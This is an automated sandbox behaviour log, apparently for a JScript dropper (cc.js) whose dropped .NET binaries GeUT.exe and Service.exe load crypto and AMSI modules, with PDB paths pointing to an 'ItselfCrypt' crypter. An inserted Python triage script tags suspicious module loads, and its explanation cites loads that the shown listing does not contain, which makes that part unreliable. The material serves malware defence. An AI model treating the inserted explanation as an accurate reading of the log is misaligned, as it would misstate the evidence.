Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: sspicli.dll
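The module-load listing above is long but carries a readable pattern: wscript.exe pulls in scrrun.dll (FileSystemObject) together with msxml3.dll and urlmon.dll, and the dropped GeUT.exe and Service.exe, both running from user-writable directories, bootstrap the CLR (mscoree.dll), engage AMSI, initialise Winsock/DNS and load the CryptoAPI providers. The script below is an added example, not part of the sandbox report, that turns this reading into repeatable triage logic over lines in the report's own "Source: <process> Section loaded: <dll>" format. The sample lines are constructed (their process paths and DLLs mirror the listing above, with an invented C:\Program Files\Vendor\app.exe as a control), and the user-writable path heuristic and tag names are this example's own assumptions.

```python
import re
from collections import defaultdict

# Constructed sample in the report's own "Source: <process> Section loaded: <dll>"
# shape. Process paths and DLL names mirror the listing above; the selection and the
# "C:\Program Files\Vendor\app.exe" control process are this example's invention.
SAMPLE_LINES = r"""
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msxml3.dll
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: rsaenh.dll
Source: C:\Program Files\Vendor\app.exe Section loaded: mscoree.dll
Source: C:\Program Files\Vendor\app.exe Section loaded: dnsapi.dll
"""

# One report line; trailing "Jump to behavior" link text, when present, is ignored.
LINE_RE = re.compile(r"^Source:\s+(?P<proc>.+?)\s+Section loaded:\s+(?P<dll>\S+)", re.I)
# Locations an unprivileged user can write to (heuristic; an assumption of this example).
USER_WRITABLE_RE = re.compile(
    r"^[a-z]:\\(users\\[^\\]+\\appdata\\|users\\public\\|programdata\\|windows\\temp\\)", re.I)

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
NET_DLLS = {"mswsock.dll", "dnsapi.dll", "iphlpapi.dll", "rasadhlp.dll"}
CRYPTO_DLLS = {"cryptsp.dll", "rsaenh.dll"}


def parse_loads(text):
    """Map each process image path to the set of module names it loaded."""
    loads = defaultdict(set)
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            loads[m.group("proc")].add(m.group("dll").lower())
    return dict(loads)


def triage(loads):
    """Return {process: [tags]} for processes whose module set is worth a look."""
    findings = {}
    for proc, dlls in loads.items():
        base = proc.rsplit("\\", 1)[-1].lower()
        tags = []
        # Script host with FileSystemObject (scrrun) plus XML/URL download support:
        # the classic JScript/VBScript dropper combination.
        if base in SCRIPT_HOSTS and "scrrun.dll" in dlls and dlls & {"msxml3.dll", "urlmon.dll"}:
            tags.append("script-dropper")
        if USER_WRITABLE_RE.match(proc):
            if "mscoree.dll" in dlls:   # CLR bootstrapped: a .NET image in %TEMP%/%APPDATA%
                tags.append("clr-in-user-path")
            if "amsi.dll" in dlls:      # AMSI engaged (on .NET 4.8, Assembly.Load from bytes triggers it)
                tags.append("amsi-scan")
            if dlls & NET_DLLS:         # Winsock/DNS initialised from a user-writable path
                tags.append("network")
            if dlls & CRYPTO_DLLS:      # CryptoAPI provider: string/config decryption or C2 crypto
                tags.append("crypto")
        if tags:
            findings[proc] = tags
    return findings


if __name__ == "__main__":
    for proc, tags in triage(parse_loads(SAMPLE_LINES)).items():
        print(f"{proc}: {', '.join(tags)}")
```

The path check is what keeps the rule usable: mscoree.dll plus dnsapi.dll is unremarkable for a signed application under Program Files, and the same pair in a binary under %TEMP% or %APPDATA% is exactly the chain this report documents. Feed it the full listing (or Sysmon event 7 image-load records rewritten into the same shape) rather than the sample.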
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: cc.js Static file information: File size 1729444 > 1048576
Source: Binary string: \Desktop\The Luck Music\ItselfCrypt-master\Resource\obj\Debug\Resource.pdb source: Service.exe, 00000018.00000002.2501892107.00000000028FF000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: \Desktop\The Luck Music\ItselfCrypt-master\Resource\obj\Debug\Resource.pdbT3n3 `3_CorDllMainmscoree.dll source: Service.exe, 00000018.00000002.2501892107.00000000028FF000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: ktop\The Luck Music\ItselfCrypt-master\Resource\obj\Debug\Resource.pdb source: GeUT.exe, 00000011.00000002.2421295277.0000000002AAF000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\Users\IzzyMichiel\Desktop\The Luck Music\ItselfCrypt-master\Resource\obj\Debug\Resource.pdbT3n3 `3_CorDllMainmscoree.dll source: GeUT.exe, 00000002.00000002.2148006746.0000000004DC0000.00000004.08000000.00040000.00000000.sdmp, GeUT.exe, 00000002.00000002.2147849334.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000004.00000002.2255004351.0000000003359000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000004.00000002.2255004351.0000000003327000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000004.00000002.2255004351.0000000003329000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 0000000B.00000002.2338909006.0000000002891000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000011.00000002.2421295277.0000000002AF6000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000011.00000002.2421295277.0000000002AAD000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000011.00000002.2421295277.00000000029C9000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000011.00000002.2421295277.00000000029C7000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000011.00000002.2421295277.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000011.00000002.2421295277.0000000002A16000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000011.00000002.2421295277.0000000002A63000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000018.00000002.2501892107.0000000002819000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000018.00000002.2501892107.00000000028B3000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000018.00000002.2501892107.0000000002817000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000018.00000002.2501892107.0000000002866000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000018.00000002.2501892107.00000000028F6000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000018.00000002.2501892107.0000000002946000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000018.00000002.2501892107.00000000028FD000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\Users\IzzyMichiel\Desktop\The Luck Music\ItselfCrypt-master\Resource\obj\Debug\Resource.pdb source: GeUT.exe, 00000002.00000002.2148006746.0000000004DC0000.00000004.08000000.00040000.00000000.sdmp, GeUT.exe, 00000002.00000002.2147849334.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000004.00000002.2255004351.0000000003359000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000004.00000002.2255004351.0000000003327000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000004.00000002.2255004351.0000000003329000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 0000000B.00000002.2338909006.0000000002891000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000011.00000002.2421295277.0000000002AF6000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000011.00000002.2421295277.0000000002AAD000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000011.00000002.2421295277.00000000029C9000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000011.00000002.2421295277.00000000029C7000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000011.00000002.2421295277.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000011.00000002.2421295277.0000000002A16000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000011.00000002.2421295277.0000000002A63000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000018.00000002.2501892107.0000000002819000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000018.00000002.2501892107.00000000028B3000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000018.00000002.2501892107.0000000002817000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000018.00000002.2501892107.0000000002866000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000018.00000002.2501892107.00000000028F6000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 
00000018.00000002.2501892107.0000000002946000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000018.00000002.2501892107.00000000028FD000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: ktop\The Luck Music\ItselfCrypt-master\Resource\obj\Debug\Resource.pdbT3n3 `3_CorDllMainmscoree.dll source: GeUT.exe, 00000011.00000002.2421295277.0000000002AAF000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

